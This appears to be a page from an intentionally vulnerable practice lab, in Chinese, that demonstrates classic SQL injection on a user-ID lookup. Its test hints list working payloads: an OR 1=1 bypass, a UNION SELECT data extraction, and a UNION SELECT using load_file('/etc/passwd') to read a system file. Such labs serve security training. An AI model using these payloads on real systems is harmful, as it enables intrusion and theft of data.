A-01 经典 SQL 注入

故意设计的安全漏洞

🔍 用户查询

输入用户 ID 查询用户信息。尝试: ?id=1?id=1 OR 1=1

💡 测试提示

正常查询: ?id=1 注入测试: ?id=1 OR 1=1 提取数据: ?id=1 UNION SELECT 1,2,3,4,5,6 读取文件: ?id=1 UNION SELECT 1,load_file('/etc/passwd'),3,4,5,6